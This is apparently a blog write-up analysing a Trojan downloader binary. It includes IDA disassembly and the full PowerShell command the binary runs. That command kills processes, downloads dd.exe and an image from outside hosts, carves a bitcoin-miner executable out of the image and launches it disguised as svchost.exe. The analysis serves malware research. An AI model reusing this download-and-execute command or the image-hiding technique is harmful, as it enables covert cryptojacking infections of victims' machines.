A look over of a Trojan.Downloader I came across on VirusTotal intelligence. Turned out to be a file hiding more secrets than a wife hiding an affair!
There is a single function in the binary, main()
, which has been compiled using MinGW: signature,MingWin32 v?.? (h)
. The segments are pretty standard which makes me think the binary hasn’t been packed: name,.text,.data,.rdata,.bss,.idata
according to PEStudio
The function of interest (main
) looks as follows:
.text:00401290 ; =============== S U B R O U T I N E ======================================= .text:00401290 .text:00401290 ; Attributes: bp-based frame .text:00401290 .text:00401290 ; int __cdecl main(int argc, const char **argv, const char **envp) .text:00401290 public _main .text:00401290 _main proc near ; CODE XREF: ___mingw_CRTStartup+E2p .text:00401290 .text:00401290 Command = dword ptr -8 .text:00401290 var_4 = dword ptr -4 .text:00401290 argc = dword ptr 8 .text:00401290 argv = dword ptr 0Ch .text:00401290 envp = dword ptr 10h .text:00401290 .text:00401290 push ebp .text:00401291 mov ebp, esp .text:00401293 sub esp, 8 .text:00401296 and esp, 0FFFFFFF0h .text:00401299 mov eax, 0 .text:0040129E add eax, 0Fh .text:004012A1 add eax, 0Fh .text:004012A4 shr eax, 4 .text:004012A7 shl eax, 4 .text:004012AA mov [ebp+var_4], eax .text:004012AD mov eax, [ebp+var_4] .text:004012B0 call __alloca .text:004012B5 call ___main .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"... .text:004012C1 call _system .text:004012C6 mov eax, 0 .text:004012CB leave .text:004012CC retn .text:004012CC _main endp .text:004012CC .text:004012CC ; ---------------------------------------------------------------------------
Looking through the above disassembled code there are 2 things to notice.
1. .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
2. .text:004012C1 call _system
Command
is the command which will be executed via the system
command (http://www.cplusplus.com/reference/cstdlib/system/)
The command which is executed is as follows:
powershell \"Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');\"
So a PowerShell session is loaded and a bunch of commands are executed, which are as follows:
Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue; Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue; Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue; Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue; Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue; (New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe'); (New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg'); (New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1'); Start-Sleep -s 10; (New-Object -com Shell.Application).ShellExecute('svchost.exe');
The script won’t actually run, due to HTTPS issues; but what if… Let’s keep exploring.
The script downloads dd
, which is a Unix utility used to convert and copy files. It also downloads an image, saves it as favicon.jpg
then converts it to a binary…
That is pretty… odd… It means there is some stenography going on behind the scenes in that image.
To save time cutting out bytes and dissecting favicon.jpg
, I’m just going run the dd commands which the script would have otherwise executed.
$ dd.exe if=favicon.jpg of=svchost.exe skip=2931 bs=1 rawwrite dd for windows version 0.6beta3. Written by John Newbigin <[email protected]> This program is covered by terms of the GPL Version 2. skip to 2931 343040+0 records in 343040+0 records out
Things get pretty interesting here. svchost.exe
is a valid binary. It was embedded within the image, in a way that didn’t invalidate the image – thus allowing it to be hosted on imagehousing.com! Pretty cool if you ask me!
In any event svchost is a 64bit bitcoin miner 🙂
References
VirusTotal
original binary - https://www.virustotal.com/en/file/9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c/analysis/
favicon.jpg - https://www.virustotal.com/file/43deab7498966d3d955fa23fbfd9cc2d5c363417c8eddd4b8db8e3e0fdeeb28f/analysis/
svchost.exe - https://www.virustotal.com/file/0ab9eed74a03bce3b40e02c77f74718c7110ceadd946484da9227c2f2a76cdbe/analysis/
Tools
- PEStudio – https://www.winitor.com/
- Hex-Rays IDA